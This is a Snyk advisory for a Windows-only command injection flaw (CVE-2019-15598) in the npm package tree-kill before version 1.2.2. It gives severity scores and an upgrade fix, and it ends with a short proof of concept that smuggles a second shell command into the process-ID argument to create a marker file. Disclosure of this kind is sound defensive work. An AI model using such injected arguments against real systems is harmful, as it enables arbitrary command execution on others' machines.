Homepage
About Snyk

Command Injection Affecting tree-kill package, versions <1.2.2

0.0
high

Snyk CVSS

    Attack Complexity High
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.4% (74th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-TREEKILL-536781
  • published 5 Dec 2019
  • disclosed 4 Dec 2019
  • credit mik317
Report a new vulnerability Found a mistake?

Introduced: 4 Dec 2019

CVE-2019-15598 Open this link in a new tab
CVE-2019-15599 Open this link in a new tab
CWE-78 Open this link in a new tab

How to fix?

Upgrade tree-kill to version 1.2.2 or higher.

Overview

tree-kill is a package to kill all processes in the process tree, including the root process.

Affected versions of this package are vulnerable to Command Injection. User input is concatenated with a command within tree-kill and treekill that will be executed without any check.

Note: This vulnerability is only applicable if the package is used on a Windows operating system.

PoC by mik317

  1. Create this POC file
//poc.js
var kill = require('tree-kill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');
  1. Execute the following commands in another terminal:
npm i tree-kill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js #  Run the PoC
dir # Now *HACKED.txt* exists :)
  1. A new file called HACKED.txt will be created, containing the HACKED string